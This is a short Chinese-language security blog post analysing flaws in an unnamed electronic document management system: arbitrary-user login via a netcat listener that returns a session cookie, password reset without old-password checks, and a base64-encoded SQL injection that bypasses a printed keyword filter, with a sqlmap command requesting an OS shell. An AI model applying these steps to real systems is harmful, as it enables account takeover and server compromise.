某电子文档管理漏洞分析

某电子文档管理漏洞分析

原创 小黑说安全 小黑说安全 2024-09-29 21:31

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,小黑说安全及文章作者不为此承担任何责任。
0x01漏洞分析

1、任意用户登录

让returnValue 1

服务开启nc -lvvp 54335  

回复一个1 

即可拿到session

拿到JSESSIONID=B63951930136E4CDD4C5ADD6AF3244B5

2、任意密码重置

所以传参要这样传入 key1==value1?key2==value2

这里不用校验旧密码即可新密码。密码必须是md5(明文).upper() md5的大写!

为什么说密码是MD5(明文)大写?

他们所用的库生成就是大写的。

3、SQL注入

参数要求是base64后的传入,这样刚刚好绕过了全局SQL注入的过滤。

waitfor|delay|script|’|exec|insert|select|delete|update|alter|drop|exists|master.|restore|count|%|chr|mid|master|truncate|char|declare|rename|–|or|xp_cmdshell|../..|

py sqlmap.py -r sqli.txt  --proxy="http://127.0.0.1:8080"  --tamper base64encode.py --force-ssl --os-shell

具体payload这里可能不太方便放,可以试着跟踪下。

0x02 小密圈

送你一张优惠券,欢迎加入小密圈,好朋友。

商务合作,报考安全证书等可联系咨询。